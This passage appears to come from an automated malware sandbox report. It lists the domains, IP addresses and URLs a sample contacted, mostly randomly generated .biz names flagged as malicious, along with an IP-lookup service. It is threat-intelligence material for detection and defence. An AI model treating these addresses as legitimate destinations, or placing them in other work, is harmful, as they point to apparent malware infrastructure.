lrxdmhrr.biz 54.244.188.177 true
vrrazpdh.biz 34.211.97.45 true
tbjrpv.biz 34.246.200.160 true
hehckyov.biz 44.221.84.105 true
xlfhhhm.biz 47.129.31.212 true
warkcdu.biz 18.141.10.107 true
npukfztj.biz 44.221.84.105 true
sxmiywsfv.biz 13.251.16.150 true
przvgke.biz 172.234.222.143 true
dwrqljrr.biz 54.244.188.177 true
gytujflc.biz 208.100.26.245 true
gvijgjwkh.biz 3.94.10.34 true
gnqgo.biz 18.208.156.248 true
deoci.biz 18.208.156.248 true
iuzpxe.biz 13.251.16.150 true
nqwjmb.biz 35.164.78.200 true
wllvnzb.biz 18.141.10.107 true
cvgrf.biz 54.244.188.177 true
lpuegx.biz 82.112.184.197 true
gxe0.com 198.252.105.91 true
bumxkqgxu.biz 44.221.84.105 true
yhqqc.biz 34.211.97.45 true
api.ipify.org 104.26.13.205 true
vcddkls.biz 18.141.10.107 true
vyome.biz 18.246.231.120 true
dlynankz.biz 85.214.228.140 true
gcedd.biz 13.251.16.150 true
xccjj.biz 18.246.231.120 true
oshhkdluh.biz 54.244.188.177 true
opowhhece.biz 18.208.156.248 true
jwkoeoqns.biz 18.208.156.248 true
jpskm.biz 34.211.97.45 true
ftxlah.biz 47.129.31.212 true
ifsaia.biz 13.251.16.150 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
rynmcq.biz 54.244.188.177 true
oflybfv.biz 47.129.31.212 true
jhvzpcfg.biz 44.221.84.105 true
saytjshyf.biz 44.221.84.105 true
fwiwk.biz 172.234.222.138 true
typgfhb.biz 13.251.16.150 true
esuzf.biz 34.211.97.45 true
myups.biz 165.160.15.20 true
yauexmxk.biz 18.208.156.248 true
ssbzmoy.biz 18.141.10.107 true
knjghuig.biz 18.141.10.107 true
yunalwv.biz 208.100.26.245 true
brsua.biz 3.254.94.185 true
mgmsclkyu.biz 34.246.200.160 true
qaynky.biz 13.251.16.150 true
qpnczch.biz 18.246.231.120 true
mnjmhp.biz 47.129.31.212 true
acwjcqqv.biz 18.141.10.107 true
jdhhbs.biz 13.251.16.150 true
anpmnmxo.biz unknown unknown
zjbpaao.biz unknown unknown
uhxqin.biz unknown unknown
zlenh.biz unknown unknown
lejtdj.biz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://bumxkqgxu.biz/ifsivywgpp false
    http://warkcdu.biz/kc true
      http://acwjcqqv.biz/ljnnvokac true
        http://ytctnunms.biz/anxrplnvdvpxn false
          http://gnqgo.biz/torfbleb false
            http://vcddkls.biz/udjkgjnyfcxmpggx true
              http://yhqqc.biz/binfxyplqyoumy false
                http://dlynankz.biz/fuqbdfcow false
                  http://lpuegx.biz/nbnssijhjwmugla true
                    http://xccjj.biz/rntyad true
                      http://yhqqc.biz/tgphsmbcvwmuwmj false
                        http://sxmiywsfv.biz/vtk false
                          http://fwiwk.biz/opshcknhcx false
                            http://xlfhhhm.biz/ijfjro false
                              http://gcedd.biz/onutm false
                                http://tbjrpv.biz/cmdgaowb false
                                  http://qpnczch.biz/h true
                                    http://yunalwv.biz/sltbypkjutmqd false
                                      http://rynmcq.biz/qqnj true
                                        http://yauexmxk.biz/dqpygue false
                                          http://lpuegx.biz/ccx true
                                            http://saytjshyf.biz/hdfj false
                                              http://gvijgjwkh.biz/txfroxnfrj false
                                                http://gytujflc.biz/mqrfuyvbhtbn false
                                                  http://gnqgo.biz/twv false
                                                    http://saytjshyf.biz/wt false
                                                      http://xlfhhhm.biz/ihrtfcsj false
                                                        http://esuzf.biz/vj false
                                                          http://knjghuig.biz/wofnqkoxvbvigg true
                                                            http://yunalwv.biz/iqacwcupavovv false
                                                              http://jdhhbs.biz/b false
                                                                http://deoci.biz/dvsybtnikly false
                                                                  http://myups.biz/omaxykiwlg false
                                                                    http://vcddkls.biz/wxdopk true
                                                                      http://vrrazpdh.biz/wmyvrothcg false
                                                                        http://vjaxhpbji.biz/pgakntaoep true
                                                                          http://ftxlah.biz/ubrpiugbci false
                                                                            http://mnjmhp.biz/dqxhnesyyna false
                                                                              http://przvgke.biz/fafj false
                                                                                http://oshhkdluh.biz/mvjuawquor true
                                                                                  http://lpuegx.biz/hpkejgwwxdp true
                                                                                    http://ifsaia.biz/kqhlsuvr false
                                                                                      http://gvijgjwkh.biz/y false
                                                                                        http://typgfhb.biz/yfqsba false
                                                                                          http://yauexmxk.biz/negfyndqat false
                                                                                            https://gxe0.com/yak2/233_Juqmtmyadyy true
                                                                                              http://przvgke.biz/kgrfegimyutt false
                                                                                                http://pywolwnvd.biz/tkvpxcpexicoa true
                                                                                                  http://wllvnzb.biz/gerofbpnhxbnel true
                                                                                                    http://ssbzmoy.biz/bmgwtyy true
                                                                                                      http://mgmsclkyu.biz/t false
                                                                                                        http://ytctnunms.biz/qkmbmbtlinurxa false
                                                                                                          https://api.ipify.org/ false
                                                                                                            http://gytujflc.biz/mhnfavogqkp false
                                                                                                              http://deoci.biz/tipcpxgs false
                                                                                                                http://vrrazpdh.biz/jsmhknoucgib false
                                                                                                                  http://brsua.biz/dgxlfefuhlec false
                                                                                                                    http://oflybfv.biz/dafungtde false
                                                                                                                      http://vjaxhpbji.biz/dhyyqtllpdwr true
                                                                                                                        http://qaynky.biz/fqwxf false
                                                                                                                          http://hehckyov.biz/isfkmckm false
                                                                                                                            http://bumxkqgxu.biz/xqvmg false
                                                                                                                              http://acwjcqqv.biz/rmu true
                                                                                                                                http://gcedd.biz/rw false